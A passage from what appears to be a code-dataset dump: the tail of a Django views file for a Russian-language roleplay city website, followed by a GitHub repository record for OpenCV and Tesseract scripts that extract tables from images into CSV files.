res.filter(active=True)\r\n res = list(reversed(res))\r\n paginator = Paginator(res, 6)\r\n page_num = request.GET.get('page')\r\n article = paginator.get_page(page_num)\r\n\r\n\r\n context = {\r\n 'articles': article,\r\n 'paginator': paginator,\r\n 'islogin': islogin,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'article/article_page.html', context)\r\n\r\n\r\ndef show_one_article(request, article_id):\r\n islogin, header_img, style_file, news = get_info(request)\r\n res = get_object_or_404(Article, pk=article_id)\r\n article_text = res.text.split(\"\\r\\n\")\r\n user = request.user.username\r\n\r\n comments = res.comments.filter(active=True)\r\n comments = reversed(comments)\r\n if request.method == 'POST':\r\n comment_form = ArticleCommentForm(data=request.POST)\r\n if comment_form.is_valid():\r\n new_comment = comment_form.save(commit=False)\r\n new_comment.name = request.user.username\r\n new_comment.role = request.user.profile.role\r\n new_comment.image = request.user.profile.user_image.url\r\n new_comment.userid = request.user.pk\r\n new_comment.article = res\r\n new_comment.save()\r\n return redirect(f\"/article/{article_id}/\")\r\n else:\r\n comment_form = ArticleCommentForm()\r\n\r\n context = {\r\n 'article': res,\r\n 'islogin': islogin,\r\n 'article_text': article_text,\r\n 'user': user,\r\n 'comments': comments,\r\n 'comment_form': comment_form,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'article/one_article_page.html', context)\r\n\r\n\r\ndef delete_article(request, article_id):\r\n islogin, header_img, style_file, news = get_info(request)\r\n article_to_delete = get_object_or_404(Article, id=article_id)\r\n name = article_to_delete.author\r\n if request.method == 'POST':\r\n form = DeleteArticleForm(request.POST, instance=article_to_delete)\r\n\r\n if form.is_valid():\r\n article_to_delete.delete()\r\n return redirect(f\"/marupik/articles/\")\r\n\r\n else:\r\n form = DeleteArticleForm(instance=article_to_delete)\r\n\r\n context = {\r\n 'islogin': islogin,\r\n 'form': form,\r\n 'name': name,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'article/delete_article_page.html', context)\r\n\r\n\r\n\r\ndef delete_article_comment(request, comment_id, article_id):\r\n islogin, header_img, style_file, news = get_info(request)\r\n comment_to_delete = get_object_or_404(ArticleComment, id=comment_id)\r\n name = comment_to_delete.name\r\n if request.method == 'POST':\r\n form = DeleteArticleCommentForm(request.POST, instance=comment_to_delete)\r\n\r\n if form.is_valid():\r\n comment_to_delete.delete()\r\n return redirect(f\"/marupik/article/{article_id}/\")\r\n\r\n else:\r\n form = DeleteArticleCommentForm(instance=comment_to_delete)\r\n\r\n context = {\r\n 'islogin': islogin,\r\n 'form': form,\r\n 'name': name,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'article/delete_article_comment_page.html', context)\r\n\r\n\r\ndef edit_article_comment(request, comment_id, article_id):\r\n islogin, header_img, style_file, news = get_info(request)\r\n res = get_object_or_404(Article, pk=article_id)\r\n article_text = res.text.split(\"\\r\\n\")\r\n user = request.user.username\r\n\r\n comments = res.comments.filter(active=True)\r\n comments = reversed(comments)\r\n comment_to_edit = get_object_or_404(ArticleComment, id=comment_id)\r\n if request.method == 'POST':\r\n edit_comment_form = EditArticleCommentForm(\r\n request.POST,\r\n instance=comment_to_edit\r\n )\r\n if edit_comment_form.is_valid():\r\n edit_comment_form.save()\r\n return redirect(f\"/marupik/article/{article_id}/\")\r\n else:\r\n err = edit_comment_form.errors.as_data()\r\n else:\r\n comment_form = ArticleCommentForm()\r\n edit_comment_form = EditArticleCommentForm(instance=comment_to_edit)\r\n\r\n context = {\r\n 'article': res,\r\n 'islogin': islogin,\r\n 'article_text': article_text,\r\n 'user': user,\r\n 'comments': comments,\r\n 'comment_form': comment_form,\r\n 'edit_comment_form': edit_comment_form,\r\n 'comment_id': comment_id,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'article/edit_article_comment_page.html', context)\r\n\r\n\r\ndef add_article(request):\r\n islogin, header_img, style_file, news = get_info(request)\r\n\r\n if(request.method == \"POST\"):\r\n article_form = AddArticleForm(request.POST, request.FILES)\r\n if(article_form.is_valid()):\r\n article = article_form.save(commit=False)\r\n article.author = request.user.username\r\n article.save()\r\n article_form.save()\r\n return redirect(\"/marupik/article\")\r\n else:\r\n article_form = AddArticleForm()\r\n\r\n role = request.user.profile.role\r\n\r\n context = {\r\n 'newses': news,\r\n 'islogin': islogin,\r\n 'article_form': article_form,\r\n 'role': role,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'article/add_article_page.html', context)\r\n\r\n\r\ndef edit_article(request, article_id):\r\n islogin, header_img, style_file, news = get_info(request)\r\n res = get_object_or_404(Article, pk=article_id)\r\n\r\n if(request.method == \"POST\"):\r\n article_form = AddArticleForm(request.POST, request.FILES, instance=res)\r\n if article_form.is_valid():\r\n article_form.save()\r\n return redirect(\"/marupik/article\")\r\n else:\r\n article_form = AddArticleForm(instance=res)\r\n\r\n author = res.author\r\n user = request.user\r\n image = res.image.url\r\n\r\n context = {\r\n 'newses': news,\r\n 'islogin': islogin,\r\n 'article_form': article_form,\r\n 'author': author,\r\n 'user': user,\r\n 'image': image,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'article/edit_article_page.html', context)\r\n\r\n# Профиль\r\ndef upgrade_profile(request):\r\n islogin, header_img, style_file, news = get_info(request)\r\n err = ''\r\n if request.method == 'POST':\r\n user_form = UserForm(request.POST, instance=request.user)\r\n profile_form = ProfileForm(\r\n request.POST,\r\n request.FILES,\r\n instance=request.user.profile\r\n )\r\n if user_form.is_valid() and profile_form.is_valid():\r\n user_form.save()\r\n\r\n profile_form.save()\r\n return redirect('/marupik/profile')\r\n else:\r\n err = user_form.errors.as_data()\r\n else:\r\n user_form = UserForm(instance=request.user)\r\n profile_form = ProfileForm(instance=request.user.profile)\r\n err = user_form.errors.as_data()\r\n\r\n err = str(err).split(\"'\")\r\n error = []\r\n for i in err:\r\n res = i.split(\".\")\r\n for ii in res:\r\n if ii == '':\r\n error.append(i)\r\n\r\n user_image = request.user.profile.user_image.url\r\n\r\n context = {\r\n 'newses': news,\r\n 'user_image': user_image,\r\n 'islogin': islogin,\r\n 'user_form': user_form,\r\n 'profile_form': profile_form,\r\n 'error': error,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'profile/upgrade_profile_page.html', context)\r\n\r\n\r\ndef profile(request):\r\n islogin, header_img, style_file, news = get_info(request)\r\n\r\n username = request.user.username\r\n user_image = request.user.profile.user_image.path\r\n full_info = request.user.profile.info.split(\"\\r\\n\")\r\n role = request.user.profile.role\r\n admin = request.user.profile.admin\r\n userid = request.user.pk\r\n\r\n if username != 'Kikono':\r\n user_image = user_image.replace(\"\\\\\", \"/\")\r\n img = Image.open(user_image)\r\n width = img.size[0]\r\n height = img.size[1]\r\n if width != height:\r\n newsize = (width, width)\r\n img = img.resize(newsize)\r\n width = img.size[0]\r\n height = img.size[1]\r\n img.save(user_image, format=\"png\")\r\n\r\n user_image = request.user.profile.user_image.url\r\n\r\n if 'Мэр' in role:\r\n cities = City.objects.all()\r\n cities = cities.filter(active=True)\r\n cities = list(reversed(cities))\r\n for city in cities:\r\n if city.mayor == username:\r\n your_city_name = city.title\r\n your_city_id = city.pk\r\n else:\r\n your_city_name = None\r\n your_city_id = None\r\n\r\n if 'Представитель города' in role:\r\n role_color = \"rgb(200, 0, 200)\"\r\n elif 'ФБР' in role or 'Глава ФБР' in role:\r\n role_color = \"blue\"\r\n elif 'Мэр' in role:\r\n role_color = \"brown\"\r\n elif 'Журналист' in role:\r\n role_color = \"rgb(0, 200, 100)\"\r\n elif style_file == 'css/light.css' or style_file == 'css/purple_gold.css':\r\n role_color = \"black\"\r\n else:\r\n role_color = \"white\"\r\n\r\n context = {\r\n 'newses': news,\r\n 'islogin': islogin,\r\n 'user_image': user_image,\r\n 'username': username,\r\n 'full_info': full_info,\r\n 'role': role,\r\n 'admin': admin,\r\n 'your_city_id': your_city_id,\r\n 'your_city_name': your_city_name,\r\n 'userid': userid,\r\n 'role_color': role_color,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'profile/profile_page.html', context)\r\n\r\n\r\ndef another_profile(request, user_id):\r\n islogin, header_img, style_file, news = get_info(request)\r\n\r\n user = get_object_or_404(User, pk=user_id)\r\n\r\n username = user.username\r\n user_image = user.profile.user_image.url\r\n full_info = user.profile.info.split(\"\\r\\n\")\r\n role = user.profile.role\r\n admin = user.profile.admin\r\n\r\n if 'Представитель города' in role:\r\n role_color = \"rgb(200, 0, 200)\"\r\n elif 'ФБР' in role or 'Глава ФБР' in role:\r\n role_color = \"blue\"\r\n elif 'Мэр' in role:\r\n role_color = \"brown\"\r\n elif 'Журналист' in role:\r\n role_color = \"rgb(0, 200, 100)\"\r\n elif style_file == 'css/light.css' or style_file == 'css/purple_gold.css':\r\n role_color = \"black\"\r\n else:\r\n role_color = \"white\"\r\n\r\n comments = user.comments.filter(active=True)\r\n if request.method == 'POST':\r\n comment_form = UserCommentForm(data=request.POST)\r\n profile_form = ChangeProfileRoleForm(\r\n request.POST,\r\n instance=user.profile\r\n )\r\n if comment_form.is_valid():\r\n new_comment = comment_form.save(commit=False)\r\n new_comment.name = request.user.username\r\n new_comment.role = request.user.profile.role\r\n new_comment.image = request.user.profile.user_image.url\r\n new_comment.user = user\r\n new_comment.userid = request.user.pk\r\n new_comment.save()\r\n return redirect(f\"/profile/{user_id}/\")\r\n else:\r\n pass\r\n\r\n if profile_form.is_valid():\r\n profile_form.save()\r\n return redirect(f\"/profile/{user_id}/\")\r\n else:\r\n pass\r\n \r\n else:\r\n comment_form = UserCommentForm()\r\n profile_form = ChangeProfileRoleForm(instance=user.profile)\r\n\r\n\r\n context = {\r\n 'newses': news,\r\n 'islogin': islogin,\r\n 'user_image': user_image,\r\n 'username': username,\r\n 'full_info': full_info,\r\n 'role': role,\r\n 'admin': admin,\r\n 'comments': comments,\r\n 'comment_form': comment_form,\r\n 'profile_form': profile_form,\r\n 'user': user,\r\n 'role_color': role_color,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n\r\n return render(request, 'profile/another_profile_page.html', context)\r\n\r\n\r\ndef delete_user_comment(request, comment_id, user_id):\r\n islogin, header_img, style_file, news = get_info(request)\r\n\r\n comment_to_delete = get_object_or_404(UserComment, id=comment_id)\r\n name = comment_to_delete.name\r\n if request.method == 'POST':\r\n form = DeleteUserCommentForm(request.POST, instance=comment_to_delete)\r\n\r\n if form.is_valid():\r\n comment_to_delete.delete()\r\n return redirect(f\"/marupik/profile/{user_id}/\")\r\n\r\n else:\r\n form = DeleteUserCommentForm(instance=comment_to_delete)\r\n\r\n context = {\r\n 'islogin': islogin,\r\n 'form': form,\r\n 'name': name,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'profile/delete_user_comment_page.html', context)\r\n\r\n\r\n# Города\r\ndef show_cities(request):\r\n islogin, header_img, style_file, news = get_info(request)\r\n\r\n city = City.objects.all()\r\n city = city.filter(active=True)\r\n city = list(reversed(city))\r\n paginator = Paginator(city, 4)\r\n page_num = request.GET.get('page')\r\n cities = paginator.get_page(page_num)\r\n\r\n for city in cities:\r\n city_image = city.image.path\r\n\r\n city_image = city_image.replace(\"\\\\\", \"/\")\r\n try:\r\n img = Image.open(city_image)\r\n width = img.size[0]\r\n height = img.size[1]\r\n if width != 300 and height != 300:\r\n newsize = (300, 300)\r\n img = img.resize(newsize)\r\n width = img.size[0]\r\n height = img.size[1]\r\n img.save(city_image, format=\"png\")\r\n except Exception:\r\n pass\r\n\r\n context = {\r\n 'newses': news,\r\n 'cities': cities,\r\n 'paginator': paginator,\r\n 'islogin': islogin,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n\r\n return render(request, 'city/cities_page.html', context)\r\n\r\n\r\ndef show_one_city(request, city_id):\r\n islogin, header_img, style_file, news = get_info(request)\r\n city = get_object_or_404(City, pk=city_id)\r\n text = city.text.split(\"\\r\\n\")\r\n\r\n status = city.status\r\n author = city.author\r\n mayor = city.mayor\r\n user = request.user\r\n\r\n images = [\r\n city.image1.path,\r\n city.image2.path,\r\n city.image3.path,\r\n city.image4.path,\r\n city.image5.path,\r\n ]\r\n\r\n for city_image in images:\r\n city_image = city_image.replace(\"\\\\\", \"/\")\r\n img = Image.open(city_image)\r\n width = img.size[0]\r\n height = img.size[1]\r\n if width != 640 and height != 400:\r\n newsize = (640, 400)\r\n img = img.resize(newsize)\r\n width = img.size[0]\r\n height = img.size[1]\r\n img.save(city_image, format=\"png\")\r\n\r\n context = {\r\n 'islogin': islogin,\r\n 'city': city,\r\n 'text': text,\r\n 'status': status,\r\n 'author': author,\r\n 'mayor': mayor,\r\n 'user': user,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'city/one_city_page.html', context)\r\n\r\n\r\ndef add_city(request):\r\n islogin, header_img, style_file, news = get_info(request)\r\n\r\n if(request.method == \"POST\"):\r\n city_form = Add_citeForm(request.POST, request.FILES)\r\n if city_form.is_valid():\r\n city = city_form.save(commit=False)\r\n city.author = request.user.username\r\n city.save()\r\n city_form.save()\r\n return redirect(\"/marupik/cities\")\r\n else:\r\n city_form = Add_citeForm()\r\n\r\n role = request.user.profile.role\r\n\r\n context = {\r\n 'newses': news,\r\n 'islogin': islogin,\r\n 'city_form': city_form,\r\n 'role': role,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'city/add_city_page.html', context)\r\n\r\n\r\ndef edit_city(request, city_id):\r\n islogin, header_img, style_file, news = get_info(request)\r\n city = get_object_or_404(City, pk=city_id)\r\n\r\n if(request.method == \"POST\"):\r\n city_form = Add_citeForm(request.POST, request.FILES, instance=city)\r\n if city_form.is_valid():\r\n city = city_form.save(commit=False)\r\n city.author = request.user.username\r\n city.save()\r\n city_form.save()\r\n return redirect(f\"/marupik/city/{city_id}\")\r\n else:\r\n city_form = Add_citeForm(instance=city)\r\n\r\n author = city.author\r\n mayor = city.mayor\r\n user = request.user\r\n image = city.image.url\r\n\r\n context = {\r\n 'islogin': islogin,\r\n 'city_form': city_form,\r\n 'author': author,\r\n 'mayor': mayor,\r\n 'user': user,\r\n 'image': image,\r\n 'city': city,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'city/edit_city_page.html', context)\r\n\r\ndef delete_city(request, city_id):\r\n islogin, header_img, style_file, news = get_info(request)\r\n city_to_delete = get_object_or_404(City, id=city_id)\r\n name = city_to_delete.author\r\n if request.method == 'POST':\r\n form = DeleteCityForm(request.POST, instance=city_to_delete)\r\n\r\n if form.is_valid():\r\n city_to_delete.delete()\r\n return redirect(f\"/marupik/news/\")\r\n\r\n else:\r\n form = DeleteCityForm(instance=city_to_delete)\r\n\r\n context = {\r\n 'islogin': islogin,\r\n 'form': form,\r\n 'name': name,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'city/delete_city_page.html', context)\r\n\r\n\r\n# Форма регистрации\r\ndef show_forms(request):\r\n islogin, header_img, style_file, news = get_info(request)\r\n\r\n form = Penetration.objects.all()\r\n form = form.filter(status=False)\r\n paginator = Paginator(form, 9)\r\n page_num = request.GET.get('page')\r\n forms = paginator.get_page(page_num)\r\n\r\n user = request.user\r\n\r\n context = {\r\n 'newses': news,\r\n 'forms': forms,\r\n 'paginator': paginator,\r\n 'islogin': islogin,\r\n 'user': user,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n\r\n return render(request, 'form/forms_page.html', context)\r\n\r\n\r\ndef show_one_form(request, form_id):\r\n islogin, header_img, style_file, news = get_info(request)\r\n form = get_object_or_404(Penetration, pk=form_id)\r\n description = form.description_yourself.split(\"\\r\\n\")\r\n\r\n if(request.method == \"POST\"):\r\n penetration_form = EditPenetrationForm(\r\n request.POST,\r\n request.FILES,\r\n instance=form\r\n )\r\n if penetration_form.is_valid():\r\n penetration_form.save()\r\n return redirect(\"/marupik/forms\")\r\n else:\r\n penetration_form = EditPenetrationForm(instance=form)\r\n\r\n user = request.user\r\n context = {\r\n 'newses': news,\r\n 'islogin': islogin,\r\n 'form': form,\r\n 'description': description,\r\n 'user': user,\r\n 'penetration_form': penetration_form,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n\r\n return render(request, 'form/one_form_page.html', context)\r\n\r\n\r\ndef add_form(request):\r\n islogin, header_img, style_file, news = get_info(request)\r\n\r\n if(request.method == \"POST\"):\r\n penetration_form = PenetrationForm(request.POST, request.FILES)\r\n if penetration_form.is_valid():\r\n form = penetration_form.save(commit=False)\r\n form.site_username = request.user.username\r\n form.save()\r\n penetration_form.save()\r\n return redirect(\"/marupik/forms\")\r\n\r\n else:\r\n penetration_form = PenetrationForm()\r\n\r\n role = ''\r\n if islogin:\r\n role = request.user.profile.role\r\n\r\n context = {\r\n 'newses': news,\r\n 'islogin': islogin,\r\n 'penetration_form': penetration_form,\r\n 'role': role,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'form/add_form_page.html', context)\r\n\r\n\r\ndef edit_form(request, form_id):\r\n islogin, header_img, style_file, news = get_info(request)\r\n\r\n form = get_object_or_404(Penetration, pk=form_id)\r\n\r\n if(request.method == \"POST\"):\r\n penetration_form = PenetrationForm(\r\n request.POST,\r\n request.FILES,\r\n instance=form\r\n )\r\n if penetration_form.is_valid():\r\n form = penetration_form.save(commit=False)\r\n form.site_username = request.user.username\r\n form.save()\r\n penetration_form.save()\r\n return redirect(f\"/marupik/form/{form_id}\")\r\n else:\r\n penetration_form = PenetrationForm(instance=form)\r\n\r\n user = request.user\r\n\r\n context = {\r\n 'newses': news,\r\n 'islogin': islogin,\r\n 'penetration_form': penetration_form,\r\n 'user': user,\r\n 'form': form,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'form/edit_form_page.html', context)\r\n\r\n\r\n# Тема\r\ndef change_theme(request, theme_name):\r\n style_file = f'css/{theme_name}.css'\r\n\r\n response = redirect(\"/marupik/main\")\r\n if theme_name == 'dark' or theme_name == 'space':\r\n response.set_cookie('main_image', 'image/main3.png')\r\n else:\r\n response.set_cookie('main_image', 'image/main1.png')\r\n\r\n response.set_cookie('theme', style_file)\r\n return response\r\n\r\n" } ]
38
harshapriyanka/Table-Detection
https://github.com/harshapriyanka/Table-Detection
6935ed6d31c0d8f4a5a679ef766bcb67aecbbb09
0d4ea08b1bf5564fc10eaaf9e993953458d7055e
6e3c13c93251e41e2cf341db0d731be3500a9adc
refs/heads/main
2023-05-31T12:30:02.023347
2021-06-22T17:52:11
2021-06-22T17:52:11
376,112,004
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7665505409240723, "alphanum_fraction": 0.7665505409240723, "avg_line_length": 46.83333206176758, "blob_id": "0133758006b83a753585d88abc034ce78c9508dd", "content_id": "cfe3051a37cd2c7d80af82217b855456d0e0b101", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 287, "license_type": "no_license", "max_line_length": 80, "num_lines": 6, "path": "/README.md", "repo_name": "harshapriyanka/Table-Detection", "src_encoding": "UTF-8", "text": "# Table-Detection\nTo detect tables from a given image and save them in CSV files.\n\n* **Basic:** It has implementation for text detection.\n* **CascadeTabNet:** It has Cascade TableNet implementation for table detection.\n* **TableNet:** It has TableNet implementation for table detection.\n" }, { "alpha_fraction": 0.5604991912841797, "alphanum_fraction": 0.5680955052375793, "avg_line_length": 28.26984214782715, "blob_id": "76687cb9f4434d55c58dc1fa9bb9a9623e62ad7a", "content_id": "a2f4bc1cbe00690ae5d02c40ff1882f7c72d565c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1843, "license_type": "no_license", "max_line_length": 86, "num_lines": 63, "path": "/CascadeTabNet/roi-to-csv.py", "repo_name": "harshapriyanka/Table-Detection", "src_encoding": "UTF-8", "text": "import numpy as np\nimport cv2\nimport pandas as pd\nimport pytesseract\nfrom math import ceil\nimport argparse\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"OCR on Tablular Image\")\n parser.add_argument('--img-path', type=str, help='path to your image.')\n parser.add_argument('--roi-path', type=str, help='folder path to roi .npy files.')\n args = parser.parse_args()\n\n text_list_path = roi_path + '/output1.npy'\n # box_list_path = roi_path + '/output2.npy' # or '/output1.npy'\n\n text_list = np.load(text_list_path)\n # box_list = np.load(box_list_path)\n\n img = cv2.imread(img_path)\n\n text_list_sort = sorted(text_list[0], key = lambda x: (x[1], x[0]))\n\n ymin_prev = 0\n rows = []\n row = []\n row_count = []\n\n for i in text_list_sort:\n xmin, ymin, xmax, ymax = i[:-1]\n xmin = ceil(xmin)\n ymin = ceil(ymin)\n xmax = ceil(xmax)\n ymax = ceil(ymax)\n roi = img[ymin:ymax, xmin:xmax]\n config = (\"-l eng --oem 3 --psm 8\")\n text = pytesseract.image_to_string(roi, config=config)\n text_processed = [t for t in text if t not in ['\\n', '\\x0c']]\n text = ''.join(text_processed)\n\n if abs(ymin-ymin_prev)>5:\n rows.append(row)\n row_count.append(len(row))\n row = [] \n row.append(text)\n else: \n row.append(text) \n \n ymin_prev = ymin\n\n updated_text_rows = list()\n column_count = max(row_count)\n\n for row in rows:\n diff = column_count - len(row)\n for _ in range(diff):\n row.append(\" \")\n updated_text_rows.append(row)\n\n # Creating a dataframe of the generated OCR list\n arr = np.array(updated_text_rows) \n dataframe = pd.DataFrame(arr)\n dataframe.to_csv(\"output.csv\", index=False)" }, { "alpha_fraction": 0.5046728849411011, "alphanum_fraction": 0.5295950174331665, "avg_line_length": 23.769229888916016, "blob_id": "edcf05b3c5ea3291c097c22be218fd0d67615d73", "content_id": "87b2646674100f4eb2c496660a427b91f8291e22", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 321, "license_type": "no_license", "max_line_length": 41, "num_lines": 13, "path": "/CascadeTabNet/detection.py", "repo_name": "harshapriyanka/Table-Detection", "src_encoding": "UTF-8", "text": "import numpy as np\n\nscore_thr = 0.85\n\nfor i, arr in enumerate(result[0]):\n bboxes = []\n if arr.shape[1] == 5 and len(arr)!=0:\n print(len(arr))\n scores = arr[:, -1]\n inds = scores > score_thr\n bboxes.append(arr[inds, :])\n path = 'output'+str(i)+'.npy'\n np.save(path, bboxes)" }, { "alpha_fraction": 0.6770310997962952, "alphanum_fraction": 0.6780341267585754, "avg_line_length": 16, "blob_id": "341e41d95b191e3bc653a5d7d7d596df8da4e012", "content_id": "6feb0490a11160f7ba5b4bf3bcd026d8f904e497", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 997, "license_type": "no_license", "max_line_length": 72, "num_lines": 58, "path": "/Basic/Readme.md", "repo_name": "harshapriyanka/Table-Detection", "src_encoding": "UTF-8", "text": "# Tabular Image to CSV:-\n\n## Prerequisites :-\n\n* [OpenCV]()\n* [pytesseract]()\n* [PIL]()\n* [Pandas]()\n* [Imutils]()\n\n\n\n### Installing Requirements:\n\nInstall requirements from requirements.txt\n```\npip install -r requirements.txt\n```\n\nTo install 'pytesseract'\n'''\napt install tesseract-ocr\napt install libtesseract-dev\npip install pytesseract\n'''\n\n##Project Structure:-\n\n* [images]() :- This folder contains images to be used for OCR.\n* [output_csv]() :- It contains result of tabular image in csv file.\n* [processed_image]() :- Contains images generated while pre-processing.\n* [requirements.txt]() :- Requirement file.\n* [image-to-csv.py]() :- Code file.\n\n\n\n\n## Python command to run script\n\n```\npython3 image-to-csv.py --img-path images/patient.png\n```\n\n### Original:-\n\n![Screenshot](images/patient.png)\n\n### Threashold:-\n\n![Screenshot](processed_image/threshold.png)\n\n### Dialated:-\n\n![Screenshot](processed_image/dilation.png)\n\n### ROI:-\n\n![Screenshot](processed_image/show_box.png)\n\n\n\n\n\n\n \n" }, { "alpha_fraction": 0.7065727710723877, "alphanum_fraction": 0.707355260848999, "avg_line_length": 22.88679313659668, "blob_id": "6a75267fdf3110356647c277fba088b76ecf6952", "content_id": "f664f817a54f2b186f8171962464ced7a58d8c8f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1278, "license_type": "no_license", "max_line_length": 191, "num_lines": 53, "path": "/CascadeTabNet/Readme.md", "repo_name": "harshapriyanka/Table-Detection", "src_encoding": "UTF-8", "text": "# Tabular Image to CSV:-\n\n## Prerequisites :-\n\n* [OpenCV]()\n* [pytesseract]()\n* [PIL]()\n* [Pandas]()\n* [Imutils]()\n\n\n\n### Installing Requirements:\n\nInstall requirements from requirements.txt\n```\npip install -r requirements.txt\n```\n\nTo install 'pytesseract'\n'''\napt install tesseract-ocr\napt install libtesseract-dev\npip install pytesseract\n'''\n\n##Project Structure:-\n\n* [images]() :- This folder contains images to be used for OCR.\n* [output_csv]() :- It contains result of tabular image in csv file.\n* [detections]() :- Images with table detections (i.e. image with bounding boxes and their co-ordinates saved as.npy files) using CascadeTabNet.\n* [requirements.txt]() :- Requirement file.\n* [roi-to-csv.py]() :- Code file.\n\n\n\n## Python command to run script\n\nTo get ROIs and image with detections add **detection.py** code to [CascadeTabNet Demo](https://github.com/DevashishPrasad/CascadeTabNet/blob/master/Demo/Cascade_TabNet_Demo.ipynb) notebook.\n\nRunning this updated notebook gives .npy files with ROIs like in **detections** folder.\n\n```\npython3 roi-to-csv.py --img-path <path-to-desired-image> --roi-path <path-to-folder-containing-npy-files>\n```\n\n### Original:-\n\n![Screenshot](images/patient.png)\n\n### ROI:-\n\n![Screenshot](detections/patient/patient.png)\n\n\n\n\n\n\n \n\n" }, { "alpha_fraction": 0.4337349534034729, "alphanum_fraction": 0.650602400302887, "avg_line_length": 15.199999809265137, "blob_id": "25ed24355161266f657d2cc94065fe2f430340c1", "content_id": "cbd4584b480a05f9e9598f71993dccbdfae10cfa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 83, "license_type": "no_license", "max_line_length": 23, "num_lines": 5, "path": "/Basic/requirements.txt", "repo_name": "harshapriyanka/Table-Detection", "src_encoding": "UTF-8", "text": "imutils==0.5.3\nnumpy==1.19.0\nopencv-python==4.2.0.34\npandas==1.0.5\nPillow==7.1.2\n\n\n" }, { "alpha_fraction": 0.5763644576072693, "alphanum_fraction": 0.6027728915214539, "avg_line_length": 30.55555534362793, "blob_id": "43ae08951c93484e5143666ce9492c7f18d6dac9", "content_id": "429c752d125c166ea1ee10a8c99db38f892553c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4544, "license_type": "no_license", "max_line_length": 97, "num_lines": 144, "path": "/Basic/image-to-csv.py", "repo_name": "harshapriyanka/Table-Detection", "src_encoding": "UTF-8", "text": "import cv2\nimport numpy as np\nimport pandas as pd\nimport random\nfrom imutils import contours\nimport argparse\nimport pytesseract\nfrom math import ceil\n\ndef preprocessing_non_tabular(path):\n img = cv2.imread(path)\n\n # ----Grayscaling Image----\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n # --- performing Otsu threshold ---\n ret, thresh1 = cv2.threshold(gray, 0, 255, cv2.THRESH_OTSU | cv2.THRESH_BINARY_INV)\n cv2.imwrite(\"processed_image/threshold.png\", thresh1)\n # cv2.imshow('thresh1', thresh1)\n # cv2.waitKey(0)\n\n # ----Image dialation----\n rect_kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (15, 3))\n dilation = cv2.dilate(thresh1, rect_kernel, iterations=1)\n cv2.imwrite(\"processed_image/dilation.png\", dilation)\n # cv2.imshow('dilation', dilation)\n # cv2.waitKey(0)\n\n # ---Finding contours ---\n contours, hierarchy = cv2.findContours(dilation, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n return img, contours[::-1]\n\n\ndef preprocessing_tabular(path):\n # Load image\n img = cv2.imread(path)\n # img = cv.GaussianBlur(img,(5,5),0)\n\n # ----Grayscaling Image----\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n # --- performing Otsu threshold ---\n thresh = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)[1]\n # thresh = cv.adaptiveThreshold(img,255,cv.ADAPTIVE_THRESH_GAUSSIAN_C,cv.THRESH_BINARY,11,2)\n\n # Remove text characters with morph open and contour filtering\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (3, 3))\n opening = cv2.morphologyEx(thresh, cv2.MORPH_CLOSE, kernel, iterations=1)\n\n cnts = cv2.findContours(opening, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n cnts = cnts[0] if len(cnts) == 2 else cnts[1]\n for c in cnts:\n area = cv2.contourArea(c)\n if area < 500:\n cv2.drawContours(opening, [c], -1, (0, 0, 0), -1)\n\n # Repair table lines, sort contours, and extract ROI\n close = 255 - cv2.morphologyEx(opening, cv2.MORPH_CLOSE, kernel, iterations=1)\n\n cnts = cv2.findContours(close, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n cnts = cnts[0] if len(cnts) == 2 else cnts[1]\n cnts, _ = contours.sort_contours(cnts, method=\"top-to-bottom\")\n return img, cnts\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"OCR on Tablular Image\")\n parser.add_argument('--img-path', type=str, help='path to your image.')\n args = parser.parse_args()\n\n # ---Image_Path---\n path = args.img_path\n # path = \"images/patient.png\"\n\n img, cnts = preprocessing_non_tabular(path)\n if len(cnts) < 8:\n img, cnts = preprocessing_tabular(path)\n\n \n dummy_image = img.copy()\n\n bboxes = []\n\n for idx, cnt in enumerate(cnts):\n x, y, w, h = 